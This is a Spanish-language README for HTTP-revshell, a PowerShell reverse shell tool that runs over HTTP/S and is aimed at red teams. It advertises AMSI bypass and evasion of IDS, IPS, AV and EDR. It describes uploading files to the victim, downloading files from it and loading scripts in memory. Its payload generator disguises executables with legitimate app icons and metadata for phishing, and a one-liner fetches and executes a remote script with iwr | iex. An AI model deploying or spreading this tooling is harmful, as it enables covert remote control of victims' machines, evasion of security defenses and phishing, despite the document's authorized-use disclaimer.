
Powershell reverse shell utilizando protocolo HTTP/S con bypass de AMSI y soporte para proxy
HTTP-revshell es una herramienta enfocada en ejercicios de redteam y pentesters. Esta herramienta proporciona una conexión inversa a través del protocolo HTTP/S. Utiliza un canal encubierto para obtener control sobre la máquina víctima mediante peticiones web y así eludir soluciones como IDS, IPS y AV.
NOTA: La herramienta no se mantendrá en términos de evasión. Con unos pocos cambios puedes evadir muchos EDR del mercado.

Uso del servidor:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Uso del cliente:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Esta función permite subir cualquier archivo a la máquina víctima.
Uso:
upload /src/path/file C:\dest\path\file
Esta función permite descargar un archivo a la máquina atacante.
Uso:
download C:\src\path\file /dst/path/file
Esta función permite cargar scripts de PowerShell sin tener que escribir en el disco de la víctima, leyendo el archivo a través de tráfico HTTP legítimo.
Uso:
loadps1 /path/to/the/local/server/PowershellScript.ps1
Este script permite crear un archivo ejecutable con el payload necesario para usar HTTP-revshell, solo necesitas seguir las instrucciones en pantalla para generarlo. Hay 6 plantillas predefinidas y una personalizable, con los datos que prefieras.
Los payloads generados por la herramienta incorporan el icono legítimo de la aplicación, así como la información de producto y copyright de la aplicación original. Además, cada uno abre la aplicación original antes de establecer la conexión con el servidor, simulando ser una aplicación legítima. Esto puede usarse para phishing o ejercicios de Red Team.
Uso del generador de payloads:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

IMPORTANTE: Todos los campos en las plantillas predefinidas se autocompletan al presionar la tecla enter.
Este script está licenciado bajo LGPLv3+. Enlace directo a la Licencia.
HTTP-revshell debe usarse únicamente para pruebas de penetración autorizadas y/o fines educativos sin ánimo de lucro. Cualquier uso indebido de este software no será responsabilidad del autor ni de ningún otro colaborador. Úsalo en tus propios servidores y/o con permiso del propietario del servidor.